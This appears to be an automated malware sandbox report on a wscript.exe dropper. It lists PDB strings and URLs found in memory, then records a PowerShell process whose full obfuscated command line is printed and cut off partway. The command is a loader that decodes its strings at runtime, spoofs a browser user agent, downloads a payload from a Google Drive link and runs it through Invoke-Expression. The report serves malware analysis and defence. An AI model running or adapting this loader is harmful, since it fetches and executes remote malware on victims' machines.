Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1478677403.0000024518932000.00000004.00000020.00020000.00000000.sdmp |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000003.00000002.1478677403.0000024518932000.00000004.00000020.00020000.00000000.sdmp |
Binary string: \??\C:\Windows\System.Management.Automation.pdb1 source: powershell.exe, 00000003.00000002.1477405694.00000245188C0000.00000004.00000020.00020000.00000000.sdmp |
Binary string: lib.pdb source: powershell.exe, 00000003.00000002.1475618652.00000245186D5000.00000004.00000020.00020000.00000000.sdmp |
Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000003.00000002.1478677403.0000024518932000.00000004.00000020.00020000.00000000.sdmp |
Binary string: System.Core.pdb source: powershell.exe, 00000003.00000002.1475618652.00000245186D5000.00000004.00000020.00020000.00000000.sdmp |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1476770908.0000024518751000.00000004.00000020.00020000.00000000.sdmp |
Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32N source: powershell.exe, 00000003.00000002.1478677403.0000024518932000.00000004.00000020.00020000.00000000.sdmp |
Binary string: System.Core.pdbk source: powershell.exe, 00000003.00000002.1475618652.00000245186D5000.00000004.00000020.00020000.00000000.sdmp |
Binary string: rlib.pdb source: powershell.exe, 00000003.00000002.1475618652.00000245186D5000.00000004.00000020.00020000.00000000.sdmp |
Binary string: CallSite.Target.pdb source: powershell.exe, 00000003.00000002.1475618652.0000024518688000.00000004.00000020.00020000.00000000.sdmp |
Source: powershell.exe, 00000003.00000002.1475618652.0000024518688000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.v |
Source: wscript.exe, 00000000.00000003.1313680179.00000231779F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1314579860.00000231779F1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/ |
Source: wscript.exe, 00000000.00000003.1315096548.00000231779D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1313805648.00000231779D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1326774060.0000023177C60000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: wscript.exe, 00000000.00000003.1313680179.00000231779F0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?82507bda4611d |
Source: wscript.exe, 00000000.00000002.1326774060.0000023177C60000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabe |
Source: wscript.exe, 00000000.00000002.1325736248.0000023175C07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1324822095.0000023175C07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1324163948.0000023175B9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1322539019.0000023175B95000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enT: |
Source: wscript.exe, 00000000.00000003.1314982983.0000023177CB6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1314661704.0000023177C8E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?82507bda46 |
Source: powershell.exe, 00000003.00000002.1437259239.0000024502019000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.google.com |
Source: powershell.exe, 00000003.00000002.1437259239.0000024502053000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.usercontent.google.com |
Source: powershell.exe, 00000003.00000002.1471665681.0000024510415000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1471665681.00000245102D3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000003.00000002.1437259239.0000024500487000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000003.00000002.1437259239.0000024500261000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000003.00000002.1437259239.0000024500487000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000003.00000002.1437259239.0000024500261000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000003.00000002.1437259239.0000024500754000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502019000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502040000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245020AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.000002450203C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 00000003.00000002.1471665681.00000245102D3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000003.00000002.1471665681.00000245102D3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000003.00000002.1471665681.00000245102D3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000003.00000002.1437259239.0000024501B22000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.googP |
Source: powershell.exe, 00000003.00000002.1437259239.0000024501B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024500487000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: powershell.exe, 00000003.00000002.1437259239.0000024500487000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1SEGcwBcOPuC6M5vDjkNXiPzaZozdUe2wP |
Source: powershell.exe, 00000003.00000002.1437259239.0000024502040000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.googh |
Source: powershell.exe, 00000003.00000002.1437259239.00000245006EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502040000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: powershell.exe, 00000003.00000002.1437259239.00000245006EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502040000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1SEGcwBcOPuC6M5vDjkNXiPzaZozdUe2w&export=download |
Source: powershell.exe, 00000003.00000002.1437259239.0000024500487000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000003.00000002.1437259239.0000024501543000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000003.00000002.1471665681.0000024510415000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1471665681.00000245102D3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000003.00000002.1437259239.0000024500754000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502019000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502040000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245020AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.000002450203C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000003.00000002.1437259239.0000024500754000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502019000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502040000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245020AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.000002450203C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000003.00000002.1437259239.0000024500754000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502019000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502040000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245020AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.000002450203C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000003.00000002.1437259239.0000024500754000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502019000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502040000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245020AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.000002450203C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000003.00000002.1437259239.0000024500754000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502019000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502040000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245020AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.000002450203C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Skraaningsvinklen = 1;$Fotografiapparaternes202='Substrin';$Fotografiapparaternes202+='g';Function Baroclinicity($Genforenende){$Piccoloerne=$Genforenende.Length-$Skraaningsvinklen;For($Vainness=5; $Vainness -lt $Piccoloerne; $Vainness+=(6)){$Flyttende+=$Genforenende.$Fotografiapparaternes202.Invoke($Vainness, $Skraaningsvinklen);}$Flyttende;}function parasols($Dugpunkts){. ($isskabes) ($Dugpunkts);}$Strandedness=Baroclinicity 'Age eMMicrooSyd,rzThermiToftmlS lenlMarp,a Mak /Relev5Samov.Blood0 fte Thol( efolW TeltiD arfnAnk.nd BagsoCampiwG,debsOmnip Fo laNBrndsTGgele Stikh1 S,ud0frang. Kond0Thoke;,aptu RumguWKoalii,arpenMongr6 Lu,s4 .nde;Sexua UnderxGejrp6Tou,n4 Midw;Dista MalmrVisitv,teto:Hykle1Dryad2 Hard1Cysto.Clupe0Prcis) boga LaborGEneboeChenicBureak Clemo Gang/Flgev2Sm.at0Dsles1 nnih0 Ribn0oxli,1 T.ag0Etape1 Otm emulFDataliHastur BliteMiscofOverboSalgsx ulph/ ,her1Decim2 Bero1A,ieh.Thras0Opstt ';$Budgetforslags=Baroclinicity 'VelseUBlurssBrnepeForlgrharmo-SaddeABefrugDeso,eSneglnQuatrtDilog ';$Programbibliotekerne=Baroclinicity 'InfamhBrygmt DisptFluespUlovmsTypeh: ,thi/Narco/Und rdRenour Hel,i skftv DetieFring.MaanegRverko orkaoPrincg femvlBrazie ,rof. Pro,cFlertoC,burm K ge/SekunuTska.cSekre? kriteUnstaxForedp Vando SealrInd.at dspa= Ranud TykmoStru w.lasknNa lsl HattoSu,ceaLibiddSmitt&HippoiVan hdAbsin=Infor1Ra koSH.ktiEb.lavG PruncDis iwK,lleB HanlcDeterOSpaliPTodiduIntr.C Bldg6BefliM,tipu5Subscv aturD AlimjPrimukAnnekN HandXRagiuiHovedP DraczSvingaRetrtZPa,ktoConcezmega.dConsiUStowbePrsen2 NdriwRaen. 
';$Noninductively=Baroclinicity 'Ubeh.>C.rap ';$isskabes=Baroclinicity ' osoniTagryeB lstxCha,l ';$Leisjes = Baroclinicity 'sejtreFristc ,olihEndo,oYemel Steff%Anti.aMinicpSpindpSluggdResida SuivtSoundaDagce%Burkg\HemagCTalrkoW mbwl.otheoOvergusmrgarbaadfa Yamst nderiFoolsoAleu,n Call.Zool.AMerogfMapuchDonk, Belor&Welte&Uhlan EndeveTil.ucRustlhWebe.o Pred Post$Sagge ';parasols (Baroclinicity 'Victu$Skrpeg FrivlInduso Omstbeks.ma NeollBe.kn:LevelP,evier,llano,ivisgUnregrThundaAlumim,agfjmCytoseSkinnrRetu.iChiconWe,trgLo dosPreovm,sbryaH,ilkeEj rssEskilsColliiUnactgNedlu=Borto(Ud,mecRentemr,ckid Styr S,ati/georgc E.gy Overt$DispeLSweeteGesanihoneysAesirjFr,eseEqua,sSerr,)saliv ');parasols (Baroclinicity 'Engan$SpilugSordal .mmeoErhvebT appaDamp,l Part: ackhAD spivColume |